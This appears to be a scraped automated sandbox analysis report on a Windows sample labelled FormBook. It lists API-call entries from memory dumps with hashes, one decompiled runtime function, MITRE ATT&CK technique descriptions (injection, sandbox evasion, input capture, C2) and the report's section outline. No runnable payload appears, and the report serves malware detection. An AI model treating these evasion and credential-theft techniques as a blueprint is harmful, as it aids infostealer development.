CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0320CD00,?,?), ref: 0321747C

Strings

net.dll, xrefs: 03217413

Memory Dump Source

Source File: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID: net.dll
API String ID: 2422867632-2431746569
Opcode ID: 740e80acd147d81fd0294e7b229c91a79e76afb3375207216f51a535f0ecf972
Instruction ID: d3af90331268ea0c20e5bd6fc953b50f96f41fec07e8839d9420168af1419c9a
Opcode Fuzzy Hash: 740e80acd147d81fd0294e7b229c91a79e76afb3375207216f51a535f0ecf972
Instruction Fuzzy Hash: 39F0287B3513442AD730FA6C9C02FA7B7D4DBA1721F1805A9FA4DAB281D6A1B49243A0

Uniqueness

Uniqueness Score: -1.00%

Function 032188F2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,03203B93), ref: 0321892D

Strings

.z`, xrefs: 0321891C, 03218928

Memory Dump Source

Source File: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: ea97c59fcd16224e0b388fb39fc6e19ca3af704af33cc539a247d23f9b59728c
Instruction ID: 00d336b687ecb665d642e7ee69db26cda0deeca5019252f2c34dbfab47f8afdb
Opcode Fuzzy Hash: ea97c59fcd16224e0b388fb39fc6e19ca3af704af33cc539a247d23f9b59728c
Instruction Fuzzy Hash: 3EE0EDB5200208AFCB04DFA8CC48EEB77A8EF84310F118659F808AB291C630E815CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 03218900, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,03203B93), ref: 0321892D

Strings

.z`, xrefs: 0321891C, 03218928

Memory Dump Source

Source File: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 907fca6252109c082256cb1d878ee24f069403848955afbe16a1707521370e3a
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 80E046B5210308ABDB18EF99CC88EA777ACEF88750F018558FE085B242C630F954CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 03207290, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 032072EA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0320730B

Memory Dump Source

Source File: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 994c45faea13cb418c5c737c6ea6ae1566b778804876f6a16b380246b8a5685b
Instruction ID: a2435ef9cd2d4ed0f8981cc2bc0e70864972c617ebc91e606e84e0892d463adf
Opcode Fuzzy Hash: 994c45faea13cb418c5c737c6ea6ae1566b778804876f6a16b380246b8a5685b
Instruction Fuzzy Hash: 87018F75AA03287AE721E6A49D02FBE77AC9B00B51F040118FF04BE1C2E6D4694A46F5

Uniqueness

Uniqueness Score: -1.00%

Function 03207313, Relevance: 3.0, APIs: 2, Instructions: 41threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0320730B

Memory Dump Source

Source File: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: b12d4cb4f46d81ece629387accf081d453b8b8cf3f8baf3d2e4fdc20f86bc34d
Instruction ID: 8a5ee751c05b04b299215d4544424fda14c6b10c073fa01d02f6be2ab9cd0f4b
Opcode Fuzzy Hash: b12d4cb4f46d81ece629387accf081d453b8b8cf3f8baf3d2e4fdc20f86bc34d
Instruction Fuzzy Hash: F3F05937A602152AF311D66C4C02FBAB39D9B41B00F1C0059FF009E1C2D6D1A48D42E0

Uniqueness

Uniqueness Score: -1.00%

Function 03218A51, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0320CFD2,0320CFD2,?,00000000,?,?), ref: 03218A90

Memory Dump Source

Source File: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 4105b8a649b09223f21c5789856d0ba4e1ea4e24a73a6570c8e90854633d9e35
Instruction ID: 61cd8a94c24e126bc9c18f6ff469c811c7cbc673072a6737ee05527140b929ce
Opcode Fuzzy Hash: 4105b8a649b09223f21c5789856d0ba4e1ea4e24a73a6570c8e90854633d9e35
Instruction Fuzzy Hash: 77012874100244ABCB14DF78CCC1DDBBBB5EF45360F108298FC589F212D67599AACBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03209B50, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 03209BC2

Memory Dump Source

Source File: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction ID: 3d1fd7c85042cbc872a461e4ed82fd483ee0249a57ea54557ba6544b9e12d0ad
Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
Instruction Fuzzy Hash: DC015EB9D1020EABDF10DAA0DD41F9EB3B89B54208F0441A4E9099B281F671E798CB91

Uniqueness

Uniqueness Score: -1.00%

Function 03218970, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 032189C4

Memory Dump Source

Source File: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: c5827402cf3fa92c277ed32e78683176843202f9c44ac472f7f85232b0324650
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 7C01AFB2210208ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 03217440, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0320CD00,?,?), ref: 0321747C

Memory Dump Source

Source File: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 66f880b88237bb7f501d0255065ba32db4baa6cc8d92a9a3ead106e4e83ff01e
Instruction ID: 115e116310d0df2bb1ba746d63b5a2a4247598480819b273ece9a7cab5b6de1d
Opcode Fuzzy Hash: 66f880b88237bb7f501d0255065ba32db4baa6cc8d92a9a3ead106e4e83ff01e
Instruction Fuzzy Hash: 12E06D773A03143AE330A59D9C02FA7B6ACCB91B60F140026FA4DEA2C1D595F85142E4

Uniqueness

Uniqueness Score: -1.00%

Function 03218A60, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0320CFD2,0320CFD2,?,00000000,?,?), ref: 03218A90

Memory Dump Source

Source File: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 94fdd6d57375a4b5dd22503e4636b71ceaeadc0c3eae1966847e2757c3a2ddde
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 1CE01AB52002086BDB10DF49CC84EE737ADAF88650F018154BE085B241CA30E8548BF5

Uniqueness

Uniqueness Score: -1.00%

Function 032188C0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(03213546,?,03213CBF,03213CBF,?,03213546,?,?,?,?,?,00000000,00000000,?), ref: 032188ED

Memory Dump Source

Source File: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 74173360b3397731f1c3072770f700b99a005053e1344c0060e02ce17e05a937
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 20E012B5210208ABDB14EF99CC84EA777ACAF88650F118558BE085B242C630F954CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 0320D43A, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,03207C93,?), ref: 0320D46B

Memory Dump Source

Source File: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: cef19ea86eefa9ba77b51df167f1a16140bd00cb8439f1eb4bee00591eaefb0e
Instruction ID: 728094c6e884b5699ff91beb02270c799735745327cb1379d85890a6580a5e9a
Opcode Fuzzy Hash: cef19ea86eefa9ba77b51df167f1a16140bd00cb8439f1eb4bee00591eaefb0e
Instruction Fuzzy Hash: 07D05B797503057BE710EBE49C02F2672D5AB55604F094064F9499B3C3D954E44045E1

Uniqueness

Uniqueness Score: -1.00%

Function 0320D440, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,03207C93,?), ref: 0320D46B

Memory Dump Source

Source File: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, Offset: 03200000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction ID: 0c50b42fb43fa17892605e5d0808f406622d0650ac1519b2ac86ab8b9417571c
Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction Fuzzy Hash: 8DD0A7797603083BE710FAE89C03F2672CD5B54A00F494064FA49DB3C3D950F40041A1

Uniqueness

Uniqueness Score: -1.00%

Function 0365967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03659694

Memory Dump Source

Source File: 00000007.00000002.920211028.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 00000007.00000002.920344060.000000000370B000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.920356093.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c00f43b1a1292ebc2e009dee51c76b2d45a48692ddcf4b63ad07fffe7b3d35ea
Instruction ID: 0b5726e6472f5723387d8c9fb6cb9cdd52513b3c4278f6cab8fcf42b84d4fc85
Opcode Fuzzy Hash: c00f43b1a1292ebc2e009dee51c76b2d45a48692ddcf4b63ad07fffe7b3d35ea
Instruction Fuzzy Hash: 6DB09B719024C9C5E615D7614708717794477D1741F16C061E1020651B4778C095F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 036AFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E036AFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0365CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E036A5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E036A5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x036afdda
0x036afde2
0x036afde5
0x036afdec
0x036afdfa
0x036afdff
0x036afe0a
0x036afe0f
0x036afe17
0x036afe1e
0x036afe19
0x036afe19
0x036afe19
0x036afe20
0x036afe21
0x036afe22
0x036afe25
0x036afe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 036AFDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 036AFE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 036AFE01

Memory Dump Source

Source File: 00000007.00000002.920211028.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 00000007.00000002.920344060.000000000370B000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.920356093.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 5bad3a506a299920e93741ed4f4d7b9cfa07c517e30c8e5651e099c6e27d3a97
Instruction ID: 8580ef8378b063733be769f5db66983970990a31817c84150002525dec92634b
Opcode Fuzzy Hash: 5bad3a506a299920e93741ed4f4d7b9cfa07c517e30c8e5651e099c6e27d3a97
Instruction Fuzzy Hash: CDF0F676240601BFDA249A49DC06F37BF6AEB45730F240359F6685A1D1EA62FC208AF5

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 1D4l9eR0W4

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Function 004186A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36
filenativeCOMMON